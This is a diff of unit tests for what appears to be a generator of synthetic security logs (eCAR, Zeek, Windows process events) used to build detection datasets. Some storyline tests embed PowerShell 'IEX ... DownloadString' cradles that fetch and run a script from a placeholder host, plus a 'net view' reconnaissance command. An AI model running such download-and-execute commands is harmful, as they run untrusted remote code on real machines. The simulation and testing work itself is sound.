-        assert proc.parent_pid == terminal_pid
-        assert proc.parent_pid != bash_pid
+        assert pid == -1
+        assert image is None
+        assert state_manager.get_process(linux.hostname, terminal_pid) is not None
+        assert state_manager.get_process(linux.hostname, bash_pid) is not None
+        python_snippets = [
+            proc
+            for proc in state_manager.get_processes_on_system(linux.hostname)
+            if proc.image == "/usr/bin/python3" and "requests.get" in proc.command_line
+        ]
+        assert python_snippets == []
 
     def test_process_user_apps_bash_pool_respects_database_role(
         self, activity_gen, test_user, monkeypatch, mock_emitters

--- a/tests/unit/test_ecar_spec_compliance.py
+++ b/tests/unit/test_ecar_spec_compliance.py
@@ -1113,6 +1113,107 @@ class TestChronologicalOutput:
         assert "principal" not in flow
         assert "image_path" not in flow["properties"]
 
+    def test_close_scrubs_flow_actor_without_visible_process_create(self, tmp_path, ts):
+        """FLOW rows should not claim actors absent from the same host stream."""
+        fmt = Mock()
+        fmt.output.template = "{}"
+        fmt.output.header_template = None
+        fmt.output.footer_template = None
+        fmt.output.encoding = "utf-8"
+        emitter = EcarEmitter(fmt, tmp_path, threaded=False)
+
+        emitter.emit_event(
+            {
+                "timestamp": ts.replace(second=5),
+                "hostname": "ws01",
+                "object": "FLOW",
+                "action": "CONNECT",
+                "objectID": "flow-123",
+                "actorID": "missing-process",
+                "pid": 1234,
+                "principal": "alice",
+                "image_path": r"C:\Program Files\App\app.exe",
+                "command_line": r'"C:\Program Files\App\app.exe" --sync',
+                "src_ip": "10.0.0.10",
+                "src_port": 49152,
+                "dst_ip": "10.0.0.20",
+                "dst_port": 443,
+                "protocol": "tcp",
+                "_host_fqdn": "ws01.example.org",
+            }
+        )
+
+        emitter.close()
+
+        rows = [
+            json.loads(line)
+            for line in (tmp_path / "ws01.example.org" / "ecar.json").read_text().splitlines()
+        ]
+        flow = next(row for row in rows if row["object"] == "FLOW")
+        assert flow["objectID"] == "flow-123"
+        assert "actorID" not in flow
+        assert "pid" not in flow
+        assert "principal" not in flow
+        assert "image_path" not in flow["properties"]
+        assert "command_line" not in flow["properties"]
+        assert flow["properties"]["dst_port"] == "443"
+
+    def test_close_preserves_flow_actor_with_visible_process_create(self, tmp_path, ts):
+        """FLOW actor attribution is valid when the same host has the process create."""
+        fmt = Mock()
+        fmt.output.template = "{}"
+        fmt.output.header_template = None
+        fmt.output.footer_template = None
+        fmt.output.encoding = "utf-8"
+        emitter = EcarEmitter(fmt, tmp_path, threaded=False)
+        process_id = "process-123"
+
+        emitter.emit_event(
+            {
+                "timestamp": ts.replace(second=1),
+                "hostname": "ws01",
+                "object": "PROCESS",
+                "action": "CREATE",
+                "objectID": process_id,
+                "pid": 1234,
+                "ppid": 4,
+                "image_path": r"C:\Program Files\App\app.exe",
+                "_host_fqdn": "ws01.example.org",
+            }
+        )
+        emitter.emit_event(
+            {
+                "timestamp": ts.replace(second=5),
+                "hostname": "ws01",
+                "object": "FLOW",
+                "action": "CONNECT",
+                "objectID": "flow-123",
+                "actorID": process_id,
+                "pid": 1234,
+                "principal": "alice",
+                "image_path": r"C:\Program Files\App\app.exe",
+                "command_line": r'"C:\Program Files\App\app.exe" --sync',
+                "src_ip": "10.0.0.10",
+                "src_port": 49152,
+                "dst_ip": "10.0.0.20",
+                "dst_port": 443,
+                "protocol": "tcp",
+                "_host_fqdn": "ws01.example.org",
+            }
+        )
+
+        emitter.close()
+
+        rows = [
+            json.loads(line)
+            for line in (tmp_path / "ws01.example.org" / "ecar.json").read_text().splitlines()
+        ]
+        flow = next(row for row in rows if row["object"] == "FLOW")
+        assert flow["actorID"] == process_id
+        assert flow["pid"] == 1234
+        assert flow["principal"] == "alice"
+        assert flow["properties"]["image_path"] == r"C:\Program Files\App\app.exe"
+
     def test_close_rewrites_linux_pids_by_source_timestamp_not_canonical_order(self, tmp_path, ts):
         """Linux PID morphology should follow rendered source time, not canonical time."""
         fmt = Mock()

--- a/tests/unit/test_email_evidence.py
+++ b/tests/unit/test_email_evidence.py
@@ -831,6 +831,84 @@ def test_outbound_route_group_override_and_global_isp_relay(tmp_path: Path, monk
     assert {row["fuid"] for row in file_records} >= set(plaintext_fuids)
 
 
+def test_smtp_starttls_certificate_files_fit_connection_response_budget(
+    tmp_path: Path,
+    monkeypatch,
+) -> None:
+    def _tls12_starttls(self, *, dst_system, **_kwargs) -> SslContext:
+        return SslContext(
+            version="TLSv12",
+            cipher="TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
+            server_name=self._email_server_fqdn(dst_system.hostname),
+            resumed=False,
+            established=True,
+            ssl_history="Csxk",
+        )
+
+    def _tiny_smtp_transfer_sizes(
+        self,
+        *,
+        message_id: str,
+        body: str,
+        attachments: list[dict[str, object]],
+        route: list[dict[str, object]],
+    ) -> list[dict[str, float | int]]:
+        del self, message_id, body, attachments
+        return [
+            {
+                "message_size": 1200 + index,
+                "orig_bytes": 2600 + index,
+                "resp_bytes": 320,
+                "duration": 0.4,
+            }
+            for index, _hop in enumerate(route)
+        ]
+
+    monkeypatch.setattr(ActivityGenerator, "_smtp_starttls_ssl_context", _tls12_starttls)
+    monkeypatch.setattr(ActivityGenerator, "_smtp_hop_uses_starttls", lambda self, **_kwargs: True)
+    monkeypatch.setattr(ActivityGenerator, "_smtp_transfer_sizes", _tiny_smtp_transfer_sizes)
+    scenario = _email_scenario()
+    engine = GenerationEngine(
+        scenario,
+        output_dir=tmp_path / "data",
+        ground_truth_dir=tmp_path,
+        artifact_dir=tmp_path / "artifacts",
+    )
+
+    engine.generate()
+
+    conn_by_uid = {
+        row["uid"]: row for row in _read_ndjson(tmp_path / "data" / "zeek-core" / "conn.json")
+    }
+    smtp_uids = {
+        row["uid"]
+        for row in _read_ndjson(tmp_path / "data" / "zeek-core" / "smtp.json")
+        if row["tls"]
+    }
+    ssl_records = _read_ndjson(tmp_path / "data" / "zeek-core" / "ssl.json")
+    ssl_file_by_fuid = {
+        row["fuid"]: row
+        for row in _read_ndjson(tmp_path / "data" / "zeek-core" / "files.json")
+        if row["source"] == "SSL"
+    }
+
+    checked = False
+    for ssl_row in ssl_records:
+        if ssl_row["uid"] not in smtp_uids:
+            continue
+        cert_fuids = ssl_row.get("cert_chain_fuids") or []
+        if not cert_fuids:
+            continue
+        cert_bytes = sum(int(ssl_file_by_fuid[fuid]["seen_bytes"]) for fuid in cert_fuids)
+        conn_row = conn_by_uid[ssl_row["uid"]]
+        assert conn_row["service"] == "smtp"
+        assert int(conn_row["resp_bytes"]) >= cert_bytes
+        assert int(conn_row["resp_ip_bytes"]) >= cert_bytes
+        assert float(conn_row["duration"]) >= 1.05 + (0.075 * len(cert_fuids))
+        checked = True
+    assert checked
+
+
 def test_mixed_internal_external_outbound_hops_scope_recipients(tmp_path: Path) -> None:
     scenario = _email_scenario()
     assert scenario.environment.email is not None

--- a/tests/unit/test_explicit_proxy.py
+++ b/tests/unit/test_explicit_proxy.py
@@ -311,6 +311,49 @@ def test_build_proxy_context_preserves_caller_browser_user_agent_for_api_domain(
     assert proxy_context.user_agent == chrome_user_agent
 
 
+def test_build_proxy_context_preserves_known_absent_http_user_agent():
+    generator = ActivityGenerator(StateManager(), {})
+    domain_controller = System(
+        hostname="DC-01",
+        ip="10.10.2.10",
+        os="Windows Server 2022",
+        type="domain_controller",
+        roles=["domain_controller"],
+    )
+    proxy = System(
+        hostname="PROXY-01",
+        ip="10.10.3.20",
+        os="Ubuntu 22.04",
+        type="server",
+        roles=["forward_proxy"],
+    )
+
+    proxy_context = generator._build_proxy_context(
+        src_ip=domain_controller.ip,
+        dst_ip="45.33.32.30",
+        dst_port=443,
+        service="ssl",
+        duration=2.5,
+        orig_bytes=600,
+        resp_bytes=4096,
+        hostname="api.westbridge-services.net",
+        source_system=domain_controller,
+        proxy_sys=proxy,
+        http=HttpContext(
+            method="GET",
+            host="api.westbridge-services.net",
+            uri="/v2/manifest",
+            user_agent="",
+            user_agent_known_absent=True,
+            response_body_len=4096,
+        ),
+        explicit_mode=True,
+        time=datetime(2024, 3, 18, 17, 42, tzinfo=UTC),
+    )
+
+    assert proxy_context.user_agent == ""
+
+
 def test_build_proxy_context_binds_server_proxy_user_agent_to_service_process():
     generator = ActivityGenerator(StateManager(), {})
     domain_controller = System(
@@ -2433,6 +2476,88 @@ class TestExplicitProxyVisibility:
         image, command_line = hint
         assert image.endswith("service-healthcheck.exe")
         assert "status.example.com" in command_line
+
+    def test_windows_server_proxy_helper_uses_system_owner_despite_user_session(self):
+        generator, _emitters = _generator(
+            [
+                NetworkSensor(
+                    type="network",
+                    name="client-tap",
+                    monitoring_segments=["workstations"],
+                    direction="outbound",
+                    log_formats=["zeek"],
+                )
+            ]
+        )
+        proxy = generator._ip_to_system["10.0.3.10"]
+        domain_controller = System(
+            hostname="DC-01",
+            ip="10.0.2.10",
+            os="Windows Server 2022",
+            type="domain_controller",
+            roles=["domain_controller", "dns_server"],
+        )
+        user = User(
+            username="aisha.johnson",
+            full_name="Aisha Johnson",
+            email="aisha.johnson@example.org",
+        )
+        generator._users_by_username = {user.username: user}
+        start_time = datetime(2024, 1, 15, 9, 45, 0, tzinfo=UTC)
+        generator.state_manager.set_current_time(start_time)
+        services_pid = generator.state_manager.create_process(
+            system=domain_controller.hostname,
+            parent_pid=4,
+            image=r"C:\Windows\System32\services.exe",
+            command_line="services.exe",
+            username="SYSTEM",
+            integrity_level="System",
+            logon_id="0x3e7",
+        )
+        logon_id = generator.state_manager.create_session(
+            username=user.username,
+            system=domain_controller.hostname,
+            logon_type=10,
+            source_ip="10.0.1.35",
+        )
+        explorer_pid = generator.state_manager.create_process(
+            system=domain_controller.hostname,
+            parent_pid=services_pid,
+            image=r"C:\Windows\explorer.exe",
+            command_line="explorer.exe",
+            username=user.username,
+            integrity_level="Medium",
+            logon_id=logon_id,
+        )
+        session = generator.state_manager.get_session(logon_id)
+        assert session is not None
+        session.explorer_pid = explorer_pid
+        generator._system_pids = {domain_controller.hostname: {"services": services_pid}}
+        request_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=UTC)
+
+        pid, image = generator._ensure_explicit_proxy_client_process(
+            source_system=domain_controller,
+            time=request_time,
+            proxy_context=ProxyContext(
+                client_ip=domain_controller.ip,
+                method="CONNECT",
+                url="status.example.com:443",
+                host="status.example.com",
+                status_code=200,
+                user_agent="Go-http-client/1.1",
+                proxy_fqdn="PROXY-01.example.org",
+            ),
+            proxy_sys=proxy,
+            dst_port=443,
+        )
+
+        proc = generator.state_manager.get_process(domain_controller.hostname, pid)
+        assert image == r"C:\Program Files\Meridian\ServiceHealth\service-healthcheck.exe"
+        assert proc is not None
+        assert proc.username == "SYSTEM"
+        assert proc.logon_id == "0x3e7"
+        assert proc.parent_pid == services_pid
+        assert proc.parent_pid != explorer_pid
 
     def test_one_shot_proxy_client_process_terminates_after_request(self):
         generator, _emitters = _generator(

--- a/tests/unit/test_phase5_system_traffic.py
+++ b/tests/unit/test_phase5_system_traffic.py
@@ -43,6 +43,7 @@ from evidenceforge.generation.engine.baseline import (
     _dc_kerberos_cycle_range,
     _dc_kerberos_tgs_range,
     _is_kerberos_member_server,
+    _is_windows_singleton_service_image,
     _kernel_uptime_stamp,
     _machine_account_ntlm_offset_seconds,
     _machine_account_tgs_gap_ms,
@@ -98,6 +99,16 @@ def test_networkmanager_message_timestamp_uses_epoch_time():
     ts = datetime(2024, 3, 18, 12, 8, 39, 757990, tzinfo=UTC)
 
     assert _networkmanager_message_timestamp(ts) == "1710763719.7580"
+
+
+def test_windows_singleton_service_image_uses_system_process_catalog():
+    """Endpoint service agents marked singleton in config should be recognized."""
+    assert _is_windows_singleton_service_image(
+        r"C:\Program Files\Palo Alto Networks\GlobalProtect\PanGPS.exe"
+    )
+    assert not _is_windows_singleton_service_image(
+        r"C:\Program Files\Google\Update\GoogleUpdate.exe"
+    )
 
 
 def test_linux_primary_interface_is_stable_per_host(linux_system):
@@ -1062,6 +1073,56 @@ class TestGenerateSystemProcess:
         ]
         assert len(security_creates) == 1
 
+    def test_stale_cleanup_preserves_catalog_singleton_service_agents(
+        self, win_system, timestamp, state_manager
+    ):
+        """Generic stale cleanup should not stop long-running singleton service agents."""
+        engine = type(
+            "FakeEngine",
+            (BaselineMixin,),
+            {
+                "_find_actor": lambda self, actor_name: User(
+                    username=actor_name,
+                    full_name=actor_name,
+                    email=f"{actor_name.lower()}@example.test",
+                    enabled=True,
+                )
+            },
+        )()
+        engine.scenario = type(
+            "Scenario",
+            (),
+            {"environment": type("Environment", (), {"systems": [win_system]})()},
+        )()
+        engine.state_manager = state_manager
+        engine.activity_generator = Mock()
+        engine._system_pids = {win_system.hostname: {}}
+
+        state_manager.set_current_time(timestamp - timedelta(hours=4))
+        services_pid = state_manager.create_process(
+            win_system.hostname,
+            4,
+            r"C:\Windows\System32\services.exe",
+            "services.exe",
+            "SYSTEM",
+            "System",
+            logon_id="0x3e7",
+        )
+        agent_pid = state_manager.create_process(
+            win_system.hostname,
+            services_pid,
+            r"C:\Program Files\Palo Alto Networks\GlobalProtect\PanGPS.exe",
+            "PanGPS.exe",
+            "SYSTEM",
+            "System",
+            logon_id="0x3e7",
+        )
+
+        engine._terminate_stale_processes(timestamp)
+
+        assert state_manager.get_process(win_system.hostname, agent_pid) is not None
+        engine.activity_generator.generate_process_termination.assert_not_called()
+
     def test_singleton_windows_service_reuse_ignores_noncanonical_future_process(
         self, activity_gen, win_system, timestamp, state_manager, mock_emitters
     ):
@@ -1110,10 +1171,10 @@ class TestGenerateSystemProcess:
         assert len(security_creates) == 1
         assert security_creates[0].process.pid == returned_pid
 
-    def test_singleton_windows_service_reuse_ignores_canonical_future_process(
+    def test_singleton_windows_service_reuse_accepts_canonical_future_process(
         self, activity_gen, win_system, timestamp, state_manager, mock_emitters
     ):
-        """Singleton service reuse should not select processes that start after event time."""
+        """Singleton service reuse should be stable when generation visits time out of order."""
         state_manager.set_current_time(timestamp)
         parent_pid = state_manager.create_process(
             win_system.hostname,
@@ -1143,10 +1204,17 @@ class TestGenerateSystemProcess:
             username="SYSTEM",
         )
 
-        assert returned_pid != future_pid
+        assert returned_pid == future_pid
         returned_proc = state_manager.get_process(win_system.hostname, returned_pid)
         assert returned_proc is not None
-        assert returned_proc.start_time == timestamp + timedelta(minutes=10)
+        assert returned_proc.start_time == timestamp + timedelta(hours=1)
+        security_creates = [
+            c[0][0]
+            for c in mock_emitters["windows_event_security"].emit.call_args_list
+            if c[0][0].event_type == "system_process_create"
+            and c[0][0].process.image == r"C:\Windows\System32\spoolsv.exe"
+        ]
+        assert security_creates == []
 
     def test_allows_multiple_non_singleton_windows_service_processes(
         self, activity_gen, win_system, timestamp, state_manager, mock_emitters

--- a/tests/unit/test_source_timing.py
+++ b/tests/unit/test_source_timing.py
@@ -236,6 +236,44 @@ def test_source_time_clamps_to_declared_bounds() -> None:
     assert event.timestamp <= planned <= latest
 
 
+def test_process_create_sources_keep_texture_after_shared_floor() -> None:
+    """A shared visibility floor must not collapse endpoint sources to one instant."""
+    planner = SourceTimingPlanner(clock_profile_name="enterprise_standard")
+    process_start = _base_time()
+    shared_floor = process_start + timedelta(seconds=10)
+    event = SecurityEvent(
+        timestamp=process_start,
+        event_type="process_create",
+        src_host=_host_context(),
+        process=_process_context(process_start),
+    )
+    seed = ("WIN-TEST-01", 4242, process_start)
+
+    source_times = {
+        source_key: planner.source_time(
+            event,
+            source_key,
+            seed_parts=seed,
+            not_before=shared_floor,
+        )
+        for source_key in (
+            "source.windows_security_process_create",
+            "source.sysmon_process_create",
+            "source.ecar_process_create",
+        )
+    }
+    values = list(source_times.values())
+    smallest_gap_ms = min(
+        abs((left - right).total_seconds() * 1000)
+        for index, left in enumerate(values)
+        for right in values[index + 1 :]
+    )
+
+    assert all(timestamp > shared_floor for timestamp in values)
+    assert len(set(values)) == len(values)
+    assert smallest_gap_ms >= 1
+
+
 def test_equal_canonical_timestamps_can_be_ordered_by_causal_edge() -> None:
     """Equal world times stay orderable when a source relationship requires it."""
     planner = SourceTimingPlanner()
@@ -429,6 +467,111 @@ def test_ecar_session_dependents_shift_after_visible_login() -> None:
     assert process["timestamp_ms"] > login_ms
     assert process["properties"]["logon_id"] == "0xf88578c"
     assert system_process["timestamp_ms"] == login_ms + 50
+
+
+def test_ecar_type7_unlock_does_not_reanchor_session_dependents() -> None:
+    """Type 7 unlock reauth rows are not original eCAR session creation anchors."""
+    unlock_ms = 1_710_770_188_500
+    rows = [
+        {
+            "timestamp_ms": unlock_ms - 60 * 60 * 1000,
+            "id": "process-event",
+            "hostname": "WS-AJOHNSON-01",
+            "object": "PROCESS",
+            "action": "CREATE",
+            "objectID": "process-object",
+            "pid": 5536,
+            "principal": "aisha.johnson",
+            "properties": {
+                "logon_id": "0x24de089",
+                "logon_type": "7",
+                "session_id": "2",
+                "image_path": r"C:\Windows\System32\mstsc.exe",
+            },
+        },
+        {
+            "timestamp_ms": unlock_ms,
+            "id": "unlock-session",
+            "hostname": "WS-AJOHNSON-01",
+            "object": "USER_SESSION",
+            "action": "LOGIN",
+            "objectID": "session-object",
+            "principal": "aisha.johnson",
+            "properties": {
+                "logon_id": "0x24de089",
+                "outcome": "success",
+                "logon_type": "7",
+                "session_id": "2",
+            },
+        },
+    ]
+
+    normalized = EcarEmitter._normalize_session_dependents_after_login(
+        [json.dumps(row, separators=(",", ":")) for row in rows]
+    )
+    process = json.loads(normalized[0])
+
+    assert process["timestamp_ms"] == unlock_ms - 60 * 60 * 1000
+
+
+def test_ecar_original_login_anchors_dependents_without_later_unlock() -> None:
+    """Original session logons still anchor dependents when a later type 7 row exists."""
+    login_ms = 1_710_770_000_000
+    unlock_ms = login_ms + 60 * 60 * 1000
+    rows = [
+        {
+            "timestamp_ms": login_ms - 200,
+            "id": "process-event",
+            "hostname": "WS-AJOHNSON-01",
+            "object": "PROCESS",
+            "action": "CREATE",
+            "objectID": "process-object",
+            "pid": 5536,
+            "principal": "aisha.johnson",
+            "properties": {
+                "logon_id": "0x24de089",
+                "session_id": "2",
+                "image_path": r"C:\Windows\System32\mstsc.exe",
+            },
+        },
+        {
+            "timestamp_ms": login_ms,
+            "id": "interactive-session",
+            "hostname": "WS-AJOHNSON-01",
+            "object": "USER_SESSION",
+            "action": "LOGIN",
+            "objectID": "session-object",
+            "principal": "aisha.johnson",
+            "properties": {
+                "logon_id": "0x24de089",
+                "outcome": "success",
+                "logon_type": "2",
+                "session_id": "2",
+            },
+        },
+        {
+            "timestamp_ms": unlock_ms,
+            "id": "unlock-session",
+            "hostname": "WS-AJOHNSON-01",
+            "object": "USER_SESSION",
+            "action": "LOGIN",
+            "objectID": "session-object",
+            "principal": "aisha.johnson",
+            "properties": {
+                "logon_id": "0x24de089",
+                "outcome": "success",
+                "logon_type": "7",
+                "session_id": "2",
+            },
+        },
+    ]
+
+    normalized = EcarEmitter._normalize_session_dependents_after_login(
+        [json.dumps(row, separators=(",", ":")) for row in rows]
+    )
+    process = json.loads(normalized[0])
+
+    assert login_ms < process["timestamp_ms"] < unlock_ms
 
 
 def test_ecar_type3_login_timestamp_follows_matching_inbound_flow(tmp_path: Path) -> None:

--- a/tests/unit/test_spawn_rules.py
+++ b/tests/unit/test_spawn_rules.py
@@ -187,6 +187,130 @@ class TestWindowsProcessTreeRealism:
         assert child_proc is not None
         assert child_proc.parent_pid == dns_pid
 
+    def test_program_files_singleton_service_reuses_active_agent(
+        self, state_manager, mock_emitters, win_system
+    ):
+        """Catalog-marked service agents should not overlap as duplicate SCM children."""
+        ag, pids = _setup_activity_gen(state_manager, mock_emitters, win_system)
+        services_pid = pids["services"]
+        first_time = datetime(2024, 3, 18, 12, 0, 0, tzinfo=UTC)
+        second_time = first_time + timedelta(minutes=7)
+
+        first_pid = ag.generate_system_process(
+            system=win_system,
+            time=first_time,
+            process_name=r"C:\Program Files\Palo Alto Networks\GlobalProtect\PanGPS.exe",
+            command_line="PanGPS.exe",
+            parent_pid=services_pid,
+            username="SYSTEM",
+        )
+        second_pid = ag.generate_system_process(
+            system=win_system,
+            time=second_time,
+            process_name=r"C:\Program Files\Palo Alto Networks\GlobalProtect\PanGPS.exe",
+            command_line="PanGPS.exe",
+            parent_pid=services_pid,
+            username="SYSTEM",
+        )
+
+        assert second_pid == first_pid
+        process_creates = [
+            call.args[0]
+            for call in mock_emitters["ecar"].emit.call_args_list
+            if call.args[0].event_type == "system_process_create"
+            and call.args[0].process is not None
+            and call.args[0].process.image.endswith("PanGPS.exe")
+        ]
+        assert len(process_creates) == 1
+
+    def test_regular_process_path_reuses_active_program_files_singleton_service(
+        self, state_manager, mock_emitters, win_system
+    ):
+        """SYSTEM process generation should adapt service-agent children into singleton reuse."""
+        ag, pids = _setup_activity_gen(state_manager, mock_emitters, win_system)
+        services_pid = pids["services"]
+        first_time = datetime(2024, 3, 18, 12, 0, 0, tzinfo=UTC)
+        second_time = first_time + timedelta(minutes=8)
+        system_user = User(
+            username="SYSTEM",
+            full_name="Local System",
+            email="system@example.test",
+            enabled=True,
+        )
+
+        first_pid = ag.generate_system_process(
+            system=win_system,
+            time=first_time,
+            process_name=r"C:\Program Files\Zscaler\ZSATunnel\ZSATunnel.exe",
+            command_line="ZSATunnel.exe",
+            parent_pid=services_pid,
+            username="SYSTEM",
+        )
+        mock_emitters["ecar"].emit.reset_mock()
+
+        second_pid = ag.generate_process(
+            user=system_user,
+            system=win_system,
+            time=second_time,
+            logon_id="0x3e7",
+            process_name=r"C:\Program Files\Zscaler\ZSATunnel\ZSATunnel.exe",
+            command_line="ZSATunnel.exe",
+            parent_pid=services_pid,
+        )
+
+        assert second_pid == first_pid
+        process_creates = [
+            call.args[0]
+            for call in mock_emitters["ecar"].emit.call_args_list
+            if call.args[0].event_type == "process_create"
+            and call.args[0].process is not None
+            and call.args[0].process.image.endswith("ZSATunnel.exe")
+        ]
+        assert process_creates == []
+
+    def test_out_of_order_program_files_singleton_service_reuses_future_candidate(
+        self, state_manager, mock_emitters, win_system
+    ):
+        """Out-of-order generation should not create overlapping service-agent siblings."""
+        ag, pids = _setup_activity_gen(state_manager, mock_emitters, win_system)
+        services_pid = pids["services"]
+        earlier_time = datetime(2024, 3, 18, 12, 13, 6, tzinfo=UTC)
+        later_time = datetime(2024, 3, 18, 12, 21, 52, tzinfo=UTC)
+        system_user = User(
+            username="SYSTEM",
+            full_name="Local System",
+            email="system@example.test",
+            enabled=True,
+        )
+
+        later_pid = ag.generate_system_process(
+            system=win_system,
+            time=later_time,
+            process_name=r"C:\Program Files\Zscaler\ZSATunnel\ZSATunnel.exe",
+            command_line="ZSATunnel.exe",
+            parent_pid=services_pid,
+            username="SYSTEM",
+        )
+        earlier_pid = ag.generate_process(
+            user=system_user,
+            system=win_system,
+            time=earlier_time,
+            logon_id="0x3e7",
+            process_name=r"C:\Program Files\Zscaler\ZSATunnel\ZSATunnel.exe",
+            command_line="ZSATunnel.exe",
+            parent_pid=services_pid,
+        )
+
+        assert earlier_pid == later_pid
+        matching_creates = [
+            call.args[0]
+            for call in mock_emitters["ecar"].emit.call_args_list
+            if call.args[0].event_type in {"process_create", "system_process_create"}
+            and call.args[0].process is not None
+            and call.args[0].process.image.endswith("ZSATunnel.exe")
+        ]
+        assert len(matching_creates) == 1
+
     def test_cli_process_gets_shell_parent(self, state_manager, mock_emitters, win_system, user):
         """CLI process (dotnet.exe) should get cmd.exe or powershell.exe as parent."""
         ag, pids = _setup_activity_gen(state_manager, mock_emitters, win_system)
@@ -1119,6 +1243,66 @@ class TestDualSessionParentSelection:
         assert parent_proc.image == r"C:\Windows\System32\cmd.exe"
         assert parent_proc.command_line == rf"C:\Windows\System32\cmd.exe /c {command_line}"
         assert parent_proc.parent_pid == pids["wmiprvse"]
+
+    def test_network_command_keeps_matching_one_shot_shell_parent(
+        self, state_manager, mock_emitters, win_system
+    ):
+        """A service shell wrapper should remain the parent of the child it invoked."""
+        service_user = User(
+            username="svc_mhsync",
+            full_name="MHS Sync",
+            email="svc_mhsync@example.com",
+            enabled=True,
+        )
+        ag, pids = _setup_activity_gen(state_manager, mock_emitters, win_system)
+        logon_time = datetime(2024, 3, 18, 17, 0, 59, tzinfo=UTC)
+        command_time = datetime(2024, 3, 18, 17, 1, 2, tzinfo=UTC)
+        command_line = r"net view \\FILE-SRV-01"
+        logon_id = ag.generate_logon(
+            service_user,
+            win_system,
+            logon_time,
+            logon_type=3,
+            source_ip="10.0.10.50",
+            emit_network_evidence=False,
+        )
+
+        shell_pid = ag._resolve_parent(
+            win_system,
+            service_user,
+            command_time,
+            logon_id,
+            r"C:\Windows\System32\net.exe",
+            command_line,
+        )
+        shell_proc = state_manager.get_process(win_system.hostname, shell_pid)
+
+        assert shell_proc is not None
+        assert shell_proc.image == r"C:\Windows\System32\cmd.exe"
+        assert shell_proc.command_line == rf"C:\Windows\System32\cmd.exe /c {command_line}"
+        assert shell_proc.parent_pid == pids["wmiprvse"]
+
+        child_pid = ag.generate_process(
+            service_user,
+            win_system,
+            command_time,
+            logon_id,
+            r"C:\Windows\System32\net.exe",
+            command_line,
+            parent_pid=shell_pid,
+            from_storyline=True,
+        )
+        child_proc = state_manager.get_process(win_system.hostname, child_pid)
+        shell_commands = [
+            proc.command_line
+            for proc in state_manager.get_processes_on_system(win_system.hostname)
+            if proc.image == r"C:\Windows\System32\cmd.exe" and " /c " in proc.command_line
+        ]
+
+        assert child_proc is not None
+        assert child_proc.parent_pid == shell_pid
+        assert rf"C:\Windows\System32\cmd.exe /c {command_line}" in shell_commands
+        assert r"C:\Windows\System32\cmd.exe /c net.exe" not in shell_commands
 
     @pytest.mark.parametrize(
         ("process_name", "command_line", "expected_parent_key"),

--- a/tests/unit/test_storyline_command_networks.py
+++ b/tests/unit/test_storyline_command_networks.py
@@ -322,6 +322,49 @@ class TestStorylineCommandNetworks:
 
         assert url == "https://cdn.example.test/stage.ps1"
 
+    def test_webclient_command_default_omits_http_user_agent(self):
+        user_agent = StorylineMixin._storyline_http_user_agent_for_command(
+            system=None,
+            process_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
+            command_line=(
+                "powershell.exe -NoProfile -Command "
+                '"IEX (New-Object Net.WebClient).DownloadString('
+                "'https://cdn.example.test/stage.ps1')\""
+            ),
+            rng=random.Random(1),
+        )
+
+        assert user_agent == ""
+
+    def test_webclient_command_preserves_explicit_http_user_agent(self):
+        user_agent = StorylineMixin._storyline_http_user_agent_for_command(
+            system=None,
+            process_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
+            command_line=(
+                "powershell.exe -NoProfile -Command "
+                '"$wc = New-Object Net.WebClient; '
+                "$wc.Headers.Add('User-Agent','StageClient/2.0'); "
+                "$wc.DownloadString('https://cdn.example.test/stage.ps1')\""
+            ),
+            rng=random.Random(1),
+        )
+
+        assert user_agent == "StageClient/2.0"
+
+    def test_invoke_webrequest_command_uses_powershell_user_agent(self):
+        user_agent = StorylineMixin._storyline_http_user_agent_for_command(
+            system=None,
+            process_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
+            command_line=(
+                "powershell.exe -NoProfile -Command "
+                "\"Invoke-WebRequest -Uri 'https://cdn.example.test/stage.ps1' "
+                '-UseBasicParsing"'
+            ),
+            rng=random.Random(1),
+        )
+
+        assert user_agent == "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WindowsPowerShell/5.1"
+
     def test_extract_http_url_skips_oversized_encoded_command(self, monkeypatch):
         def fail_b64decode(*args: Any, **kwargs: Any) -> bytes:
             raise AssertionError("oversized EncodedCommand token should not be decoded")
@@ -2851,6 +2894,47 @@ class TestStorylineCommandSideEffects:
         assert conn["hostname"] == "cdn-assets-update.com"
         assert conn["preserve_dst_ip"] is True
 
+    def test_process_url_network_uses_webclient_source_native_user_agent(self):
+        source = System(
+            hostname="DC-01",
+            ip="10.10.2.10",
+            os="Windows Server 2022",
+            type="domain_controller",
+        )
+        actor = User(
+            username="alice",
+            full_name="Alice Example",
+            email="alice@example.com",
+        )
+        engine = object.__new__(StorylineMixin)
+        engine.scenario = SimpleNamespace(
+            environment=SimpleNamespace(systems=[source], service_accounts=[])
+        )
+        engine.state_manager = _FakeStateManager()
+        engine.activity_generator = _FakeActivityGenerator()
+        engine.dispatcher = SimpleNamespace(visibility_engine=None)
+        spec = SimpleNamespace(
+            type="process",
+            process_name=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
+            command_line=(
+                "powershell.exe -NoProfile -Command "
+                '"IEX (New-Object Net.WebClient).DownloadString('
+                "'https://cdn.example.test/stage.ps1')\""
+            ),
+        )
+
+        engine._execute_typed_event(
+            spec=spec,
+            actor=actor,
+            system=source,
+            time=datetime(2026, 5, 11, 12, 0, tzinfo=UTC),
+            activity="download stage",
+            explicit_types={"process"},
+        )
+
+        conn = engine.activity_generator.connections[-1]
+        assert conn["http"].user_agent == ""
+
     def test_connection_ground_truth_uses_generator_effective_destination(self):
         source = System(
             hostname="SRC",
@@ -2904,6 +2988,130 @@ class TestStorylineCommandSideEffects:
         assert event["dst_ip"] == "23.45.158.140"
         assert event["uid"] == "Cscptransfer00001"
         assert engine.activity_generator.connections[0]["dst_ip"] == "93.184.216.34"
+
+    def test_typed_rdp_session_registers_logon_for_follow_on_processes(self):
+        """Processes after a typed RDP event should reuse that session ownership."""
+        source = System(
+            hostname="WS-MCHEN-01",
+            ip="10.10.1.31",
+            os="Windows 11 Enterprise",
+            type="workstation",
+        )
+        target = System(
+            hostname="DC-01",
+            ip="10.10.0.10",
+            os="Windows Server 2022",
+            type="domain_controller",
+        )
+        actor = User(
+            username="marcus.chen",
+            full_name="Marcus Chen",
+            email="marcus.chen@example.local",
+        )
+        session_time = datetime(2026, 5, 11, 12, 0, tzinfo=UTC)
